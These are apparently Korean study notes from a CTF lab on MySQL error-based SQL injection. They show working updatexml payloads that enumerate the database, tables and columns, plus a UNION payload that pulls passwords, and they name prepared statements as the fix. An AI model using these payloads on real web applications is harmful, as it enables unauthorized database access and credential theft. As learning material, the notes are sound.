** Error Based SQLi
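-> DB의 SQL 에러 메시지가 응답에 그대로 포함되는 경우에만 가능! (에러 메시지를 숨기면 이 경로만 막힐 뿐이고, 근본 대책은 Prepared Statement로 입력값을 바인딩하는 것이다.)
-> 에러를 의도적으로 발생시키고, 그 에러 메시지 안에 우리가 원하는 질의문의 실행 결과가 포함되어 나오게 하는 것!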
mysql error based sql injection function
updatexml(null,':sqli',null)
:test
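UPDATEXML 함수는 인수로서 XMLType 인스턴스와 XPath-값 쌍을 취하고, 업데이트된 값을 가지는 XMLType 인스턴스를 반환한다. (이 문장은 Oracle 문서의 설명이다. MySQL에서는 UpdateXML(xml_target, xpath_expr, new_xml) 형태이며, 두 번째 인수가 올바른 XPath 식이 아니면 에러가 나고 그 문자열이 에러 메시지에 그대로 표시된다. 앞에 0x3a(':')를 붙이는 이유가 이것이다.)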
updatexml(null,concat(0x3a,(select 'test')),null)
' and updatexml(null,concat(0x3a,(select 'test')),null) and '1'='1
where id = '' and updatexml(null,concat(0x3a,(select 'test')),null) and '1'='1'
여러가지로 실행
ID : 1' and updatexml(null,concat(0x3a,(select 'normaltic')),null) and '1'='1
select ~~~ from ~~~~ where id='1' and updatexml(null,concat(0x3a,(select 'normaltic')),null) and '1'='1'
select ~~~~~
1' and updatexml(null,concat(0x3a,(SELECT 문)),null) and '1'='1
select database()
1' and updatexml(null,concat(0x3a,(select database())),null) and '1'='1
- limit [시작위치], [개수]  (시작위치는 0부터 센다)
select table_name from information_schema.tables WHERE table_schema = 'segFault_sqli' limit 3, 1
1' and updatexml(null,concat(0x3a,(select table_name from information_schema.tables WHERE table_schema = 'segFault_sqli' limit 1, 1)),null) and '1'='1
// flag_table
// member
리미트에 따른 결과 출력
1' and updatexml(null,concat(0x3a,(select column_name from information_schema.columns where table_name='flag_table' limit 0, 1)),null) and '1'='1
// flag
1' union select column_name,2,3,4,5,6 from information_schema.columns where table_name='flag_table'#
select id,2,3,password,5,6 from user_info #
1' and updatexml(null,concat(0x3a,("여기" limit 0, 1)),null) and '1'='1
완 - 료